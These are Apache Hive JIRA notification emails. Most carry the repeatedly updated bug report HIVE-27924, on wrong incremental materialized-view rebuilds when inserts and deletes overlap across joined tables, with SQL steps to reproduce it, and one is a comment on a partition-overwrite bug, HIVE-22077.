[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924: - Description: h1. Summary The incremental rebuild plan and execution output are incorrect when one side of the table join has inserted/deleted join keys that the other side has deleted/inserted (note the order). The argument is that tuples that have never been present simultaneously should not interact with one another, i.e., one's inserts should not join the other's deletes. h1. Related Test Case The bug was discovered during replication of the test case: ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? h1. Steps to Reproduce the Issue # Configurations: {code:sql} SET hive.vectorized.execution.enabled=false; set hive.support.concurrency=true; set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; set hive.strict.checks.cartesian.product=false; set hive.materializedview.rewriting=true;{code} # {code:sql} create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} # {code:sql} insert into cmv_basetable_n6 values (1, 'alfred', 10.30, 2), (1, 'charlie', 20.30, 2); {code} # {code:sql} create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} # {code:sql} insert into cmv_basetable_2_n3 values (1, 'bob', 30.30, 2), (1, 'bonnie', 40.30, 2);{code} # {code:sql} CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') AS SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0;{code} # {code:sql} show tables; {code} !截图.PNG! # Select tuples, including deletion and with VirtualColumn's, from the MV and source tables. We see that the MV is correctly built upon creation: {code:sql} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} !截图1.PNG! # {code:sql} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} !截图2.PNG! # {code:sql} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} !截图3.PNG! # Now make an insert to the LHS and a delete to the RHS source table: {code:sql} insert into cmv_basetable_n6 values (1, 'kevin', 50.30, 2); DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code} # Select again to see what happened: {code:sql} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} !截图4.PNG! # {code:sql} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} !截图5.PNG! # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, which is incorrect already: {code:sql} EXPLAIN CBO ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code} !截图6.PNG! # Rebuild MV and see (incorrect) results: {code:sql} ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} !截图7.PNG! # Run MV definition directly, which outputs incorrect results because the MV is enabled for MV-based query rewrite, i.e., the following query will output what's in the MV for the time being: {code:sql} SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0; {code} !截图8.PNG! # Disable MV-based query rewrite for the MV and re-run the definition, which should give the correct results: {code:sql} ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE; SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0;{code} !截图9.PNG! h1. Note This issue is also seen in update-incurred inserts/deletes. was: h1. Summary The incremental rebuild plan and execution output are incorrect when one side of the table join has inserted/deleted join keys that the other side has deleted/inserted (note the order). The argument is that tuples that have never been present simultaneously should not interact with one another, i.e., one's inserts should not join the other's deletes. h1. Related Test Case The bug was discovered during replication of the test case: ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? h1. Steps to Reproduce the Issue # Configurations: {code:java} SET hive.vectorized.execution.enabled=false; set hive.support.concurrency=true; set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; set hive.strict.checks.cartesian.product=false; set
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924: - Attachment: 截图9.PNG > Incremental rebuild goes wrong when inserts and deletes overlap between the > source tables > - > > Key: HIVE-27924 > URL: https://issues.apache.org/jira/browse/HIVE-27924 > Project: Hive > Issue Type: Bug > Components: Materialized views >Affects Versions: 4.0.0-beta-1 > Environment: * Docker version : 19.03.6 > * Hive version : 4.0.0-beta-1 > * Driver version : Hive JDBC (4.0.0-beta-1) > * Beeline version : 4.0.0-beta-1 >Reporter: Wenhao Li >Priority: Critical > Labels: bug, hive, materializedviews > Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, > 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG > > > h1. Summary > The incremental rebuild plan and execution output are incorrect when one side > of the table join has inserted/deleted join keys that the other side has > deleted/inserted (note the order). > The argument is that tuples that have never been present simultaneously > should not interact with one another, i.e., one's inserts should not join the > other's deletes. > h1. Related Test Case > The bug was discovered during replication of the test case: > ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? > h1. Steps to Reproduce the Issue > # Configurations: > {code:java} > SET hive.vectorized.execution.enabled=false; > set hive.support.concurrency=true; > set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; > set hive.strict.checks.cartesian.product=false; > set hive.materializedview.rewriting=true;{code} > # > {code:java} > create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) > stored as orc TBLPROPERTIES ('transactional'='true'); {code} > # > {code:java} > insert into cmv_basetable_n6 values > (1, 'alfred', 10.30, 2), > (1, 'charlie', 20.30, 2); {code} > # > {code:java} > create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d > int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} > # > {code:java} > insert into cmv_basetable_2_n3 values > (1, 'bob', 30.30, 2), > (1, 'bonnie', 40.30, 2);{code} > # > {code:java} > CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES > ('transactional'='true') AS > SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c > FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = > cmv_basetable_2_n3.a) > WHERE cmv_basetable_2_n3.c > 10.0;{code} > # > {code:java} > show tables; {code} > !截图.PNG! > # Select tuples, including deletion and with VirtualColumn's, from the MV > and source tables. We see that the MV is correctly built upon creation: > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} > !截图1.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} > !截图2.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} > !截图3.PNG! > # Now make an insert to the LHS and a delete to the RHS source table: > {code:java} > insert into cmv_basetable_n6 values > (1, 'kevin', 50.30, 2); > DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code} > # Select again to see what happened: > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} > !截图4.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} > !截图5.PNG! > # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, > which is incorrect already: > {code:java} > EXPLAIN CBO > ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code} > !截图6.PNG! > # Rebuild MV and see (incorrect) results: > {code:java} > ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} > !截图7.PNG! > # Run MV definition directly, which outputs incorrect results because the MV > is enabled for MV-based query rewrite, i.e., the following query will output > what's in the MV for the time being: > {code:java} > SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c > FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = > cmv_basetable_2_n3.a) > WHERE cmv_basetable_2_n3.c > 10.0; {code} > !截图8.PNG! > # Disable MV-based query rewrite for the MV and re-run the definition, which > should give the correct results: > {code:java} > ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE; > SELECT cmv_basetable_n6.a,
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924: - Attachment: (was: 截图9.PNG) > Incremental rebuild goes wrong when inserts and deletes overlap between the > source tables > - > > Key: HIVE-27924 > URL: https://issues.apache.org/jira/browse/HIVE-27924 > Project: Hive > Issue Type: Bug > Components: Materialized views >Affects Versions: 4.0.0-beta-1 > Environment: * Docker version : 19.03.6 > * Hive version : 4.0.0-beta-1 > * Driver version : Hive JDBC (4.0.0-beta-1) > * Beeline version : 4.0.0-beta-1 >Reporter: Wenhao Li >Priority: Critical > Labels: bug, hive, materializedviews > Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, > 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG > > > h1. Summary > The incremental rebuild plan and execution output are incorrect when one side > of the table join has inserted/deleted join keys that the other side has > deleted/inserted (note the order). > The argument is that tuples that have never been present simultaneously > should not interact with one another, i.e., one's inserts should not join the > other's deletes. > h1. Related Test Case > The bug was discovered during replication of the test case: > ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? > h1. Steps to Reproduce the Issue > # Configurations: > {code:java} > SET hive.vectorized.execution.enabled=false; > set hive.support.concurrency=true; > set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; > set hive.strict.checks.cartesian.product=false; > set hive.materializedview.rewriting=true;{code} > # > {code:java} > create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) > stored as orc TBLPROPERTIES ('transactional'='true'); {code} > # > {code:java} > insert into cmv_basetable_n6 values > (1, 'alfred', 10.30, 2), > (1, 'charlie', 20.30, 2); {code} > # > {code:java} > create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d > int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} > # > {code:java} > insert into cmv_basetable_2_n3 values > (1, 'bob', 30.30, 2), > (1, 'bonnie', 40.30, 2);{code} > # > {code:java} > CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES > ('transactional'='true') AS > SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c > FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = > cmv_basetable_2_n3.a) > WHERE cmv_basetable_2_n3.c > 10.0;{code} > # > {code:java} > show tables; {code} > !截图.PNG! > # Select tuples, including deletion and with VirtualColumn's, from the MV > and source tables. We see that the MV is correctly built upon creation: > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} > !截图1.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} > !截图2.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} > !截图3.PNG! > # Now make an insert to the LHS and a delete to the RHS source table: > {code:java} > insert into cmv_basetable_n6 values > (1, 'kevin', 50.30, 2); > DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code} > # Select again to see what happened: > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} > !截图4.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} > !截图5.PNG! > # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, > which is incorrect already: > {code:java} > EXPLAIN CBO > ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code} > !截图6.PNG! > # Rebuild MV and see (incorrect) results: > {code:java} > ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} > !截图7.PNG! > # Run MV definition directly, which outputs incorrect results because the MV > is enabled for MV-based query rewrite, i.e., the following query will output > what's in the MV for the time being: > {code:java} > SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c > FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = > cmv_basetable_2_n3.a) > WHERE cmv_basetable_2_n3.c > 10.0; {code} > !截图8.PNG! > # Disable MV-based query rewrite for the MV and re-run the definition, which > should give the correct results: > {code:java} > ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE; > SELECT cmv_basetable_n6.a,
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924: - Description: h1. Summary The incremental rebuild plan and execution output are incorrect when one side of the table join has inserted/deleted join keys that the other side has deleted/inserted (note the order). The argument is that tuples that have never been present simultaneously should not interact with one another, i.e., one's inserts should not join the other's deletes. h1. Related Test Case The bug was discovered during replication of the test case: ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? h1. Steps to Reproduce the Issue # Configurations: {code:java} SET hive.vectorized.execution.enabled=false; set hive.support.concurrency=true; set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; set hive.strict.checks.cartesian.product=false; set hive.materializedview.rewriting=true;{code} # {code:java} create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} # {code:java} insert into cmv_basetable_n6 values (1, 'alfred', 10.30, 2), (1, 'charlie', 20.30, 2); {code} # {code:java} create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} # {code:java} insert into cmv_basetable_2_n3 values (1, 'bob', 30.30, 2), (1, 'bonnie', 40.30, 2);{code} # {code:java} CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') AS SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0;{code} # {code:java} show tables; {code} !截图.PNG! # Select tuples, including deletion and with VirtualColumn's, from the MV and source tables. We see that the MV is correctly built upon creation: {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} !截图1.PNG! # {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} !截图2.PNG! # {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} !截图3.PNG! # Now make an insert to the LHS and a delete to the RHS source table: {code:java} insert into cmv_basetable_n6 values (1, 'kevin', 50.30, 2); DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code} # Select again to see what happened: {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} !截图4.PNG! # {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} !截图5.PNG! # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, which is incorrect already: {code:java} EXPLAIN CBO ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code} !截图6.PNG! # Rebuild MV and see (incorrect) results: {code:java} ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} !截图7.PNG! # Run MV definition directly, which outputs incorrect results because the MV is enabled for MV-based query rewrite, i.e., the following query will output what's in the MV for the time being: {code:java} SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0; {code} !截图8.PNG! # Disable MV-based query rewrite for the MV and re-run the definition, which should give the correct results: {code:java} ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE; SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0;{code} !截图9.PNG! h1. Note This issue is also seen in update-incurred inserts/deletes. was: h1. Summary The incremental rebuild plan and execution output are incorrect when one side of the table join has inserted/deleted join keys that the other side has deleted/inserted (note the order). The argument is that tuples that have never been present simultaneously should not interact with one another, i.e., one's inserts should not join the other's deletes. h1. Related Test Case The bug was discovered during replication of the test case: ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? h1. Steps to Reproduce the Issue # Configurations: {code:java} SET hive.vectorized.execution.enabled=false; set hive.support.concurrency=true; set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; set
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924: - Environment: * Docker version : 19.03.6 * Hive version : 4.0.0-beta-1 * Driver version : Hive JDBC (4.0.0-beta-1) * Beeline version : 4.0.0-beta-1 was: h1. Software Env. * Docker version : 19.03.6 * Hive version : 4.0.0-beta-1 * Driver version : Hive JDBC (4.0.0-beta-1) * Beeline version : 4.0.0-beta-1 > Incremental rebuild goes wrong when inserts and deletes overlap between the > source tables > - > > Key: HIVE-27924 > URL: https://issues.apache.org/jira/browse/HIVE-27924 > Project: Hive > Issue Type: Bug > Components: Materialized views >Affects Versions: 4.0.0-beta-1 > Environment: * Docker version : 19.03.6 > * Hive version : 4.0.0-beta-1 > * Driver version : Hive JDBC (4.0.0-beta-1) > * Beeline version : 4.0.0-beta-1 >Reporter: Wenhao Li >Priority: Critical > Labels: bug, hive, materializedviews > Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, > 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG > > > h1. Summary > The incremental rebuild plan and execution output are incorrect when one side > of the table join has inserted/deleted join keys that the other side has > deleted/inserted (note the order). > The argument is that tuples that have never been present simultaneously > should not interact with one another, i.e., one's inserts should not join the > other's deletes. > h1. Related Test Case > The bug was discovered during replication of the test case: > ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? > h1. Steps to Reproduce the Issue > # Configurations: > {code:java} > SET hive.vectorized.execution.enabled=false; > set hive.support.concurrency=true; > set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; > set hive.strict.checks.cartesian.product=false; > set hive.materializedview.rewriting=true;{code} > # > {code:java} > create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) > stored as orc TBLPROPERTIES ('transactional'='true'); {code} > # > {code:java} > insert into cmv_basetable_n6 values > (1, 'alfred', 10.30, 2), > (1, 'charlie', 20.30, 2); {code} > # > {code:java} > create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d > int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} > # > {code:java} > insert into cmv_basetable_2_n3 values > (1, 'bob', 30.30, 2), > (1, 'bonnie', 40.30, 2);{code} > # > {code:java} > CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES > ('transactional'='true') AS > SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c > FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = > cmv_basetable_2_n3.a) > WHERE cmv_basetable_2_n3.c > 10.0;{code} > # > {code:java} > show tables; {code} > !截图.PNG! > # Select tuples, including deletion and with VirtualColumn's, from the MV > and source tables. We see that the MV is correctly built upon creation: > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} > !截图1.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} > !截图2.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} > !截图3.PNG! > # Now make an insert to the LHS and a delete to the RHS source table: > {code:java} > insert into cmv_basetable_n6 values > (1, 'kevin', 50.30, 2); > DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code} > # Select again to see what happened: > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} > !截图4.PNG! > # > {code:java} > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} > !截图5.PNG! > # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, > which is incorrect already: > {code:java} > EXPLAIN CBO > ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code} > !截图6.PNG! > # Rebuild MV and see (incorrect) results: > {code:java} > ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; > SELECT ROW__IS__DELETED, ROW__ID, * FROM > cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} > !截图7.PNG! > # Run MV definition directly, which outputs incorrect results because the MV > is enabled for MV-based query rewrite, i.e., the following query will output > what's in the MV for the time being: > {code:java} > SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c > FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = >
[jira] [Commented] (HIVE-22077) Inserting overwrite partitions clause does not clean directories while partitions' info is not stored in metadata
[ https://issues.apache.org/jira/browse/HIVE-22077?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791918#comment-17791918 ] Kiran Velumuri commented on HIVE-22077: --- [~Bone An] I see that this issue has been inactive for a long time. In case you are not working on this, can I pick this up? Thanks. > Inserting overwrite partitions clause does not clean directories while > partitions' info is not stored in metadata > - > > Key: HIVE-22077 > URL: https://issues.apache.org/jira/browse/HIVE-22077 > Project: Hive > Issue Type: Bug > Components: Hive >Affects Versions: 1.1.1, 2.3.4, 4.0.0 >Reporter: Hui An >Assignee: Hui An >Priority: Major > Attachments: HIVE-22077.patch.1 > > > Inserting overwrite static partitions may not clean related HDFS location if > partitions' info is not stored in metadata. > Steps to reproduce this issue : > > 1. Create a managed table : > > {code:sql} > CREATE TABLE `test`( >`id` string) > PARTITIONED BY ( >`dayno` string) > ROW FORMAT SERDE >'org.apache.hadoop.hive.ql.io.orc.OrcSerde' > STORED AS INPUTFORMAT >'org.apache.hadoop.hive.ql.io.orc.OrcInputFormat' > OUTPUTFORMAT >'org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat' > LOCATION >'hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test' > TBLPROPERTIES ( >'transient_lastDdlTime'='1564731656') > {code} > > 2. Create partition's directory and put some data in it > > {code:java} > hdfs dfs -mkdir > hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802 > hdfs dfs -put test.data > hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802 > {code} > > 3. Insert overwrite partition dayno=20190802 > > {code:sql} > INSERT OVERWRITE TABLE test PARTITION(dayno='20190802') > SELECT "some value"; > {code} > > 4. We could see the test.data under partition directory is not deleted. > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
Wenhao Li created HIVE-27924: Summary: Incremental rebuild goes wrong when inserts and deletes overlap between the source tables Key: HIVE-27924 URL: https://issues.apache.org/jira/browse/HIVE-27924 Project: Hive Issue Type: Bug Components: Materialized views Affects Versions: 4.0.0-beta-1 Environment: h1. Software Env. * Docker version : 19.03.6 * Hive version : 4.0.0-beta-1 * Driver version : Hive JDBC (4.0.0-beta-1) * Beeline version : 4.0.0-beta-1 Reporter: Wenhao Li Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG h1. Summary The incremental rebuild plan and execution output are incorrect when one side of the table join has inserted/deleted join keys that the other side has deleted/inserted (note the order). The argument is that tuples that have never been present simultaneously should not interact with one another, i.e., one's inserts should not join the other's deletes. h1. Related Test Case The bug was discovered during replication of the test case: ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q?? h1. Steps to Reproduce the Issue # Configurations: {code:java} SET hive.vectorized.execution.enabled=false; set hive.support.concurrency=true; set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager; set hive.strict.checks.cartesian.product=false; set hive.materializedview.rewriting=true;{code} # {code:java} create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} # {code:java} insert into cmv_basetable_n6 values (1, 'alfred', 10.30, 2), (1, 'charlie', 20.30, 2); {code} # {code:java} create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true'); {code} # {code:java} insert into cmv_basetable_2_n3 values (1, 'bob', 30.30, 2), (1, 'bonnie', 40.30, 2);{code} # {code:java} CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') AS SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0;{code} # {code:java} show tables; {code} !截图.PNG! # Select tuples, including deletion and with VirtualColumn's, from the MV and source tables. We see that the MV is correctly built upon creation: {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} !截图1.PNG! # {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} !截图2.PNG! # {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} !截图3.PNG! # Now make an insert to the LHS and a delete to the RHS source table: {code:java} insert into cmv_basetable_n6 values (1, 'kevin', 50.30, 2); DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code} # Select again to see what happened: {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code} !截图4.PNG! # {code:java} SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code} !截图5.PNG! # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, which is incorrect already: {code:java} EXPLAIN CBO ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code} !截图6.PNG! # Rebuild MV and see (incorrect) results: {code:java} ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code} !截图7.PNG! # Run MV definition directly, which outputs incorrect results because the MV is enabled for MV-based query rewrite, i.e., the following query will output what's in the MV for the time being: {code:java} SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0; {code} !截图8.PNG! # Disable MV-based query rewrite for the MV and re-run the definition, which should give the correct results: {code:java} ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE; SELECT 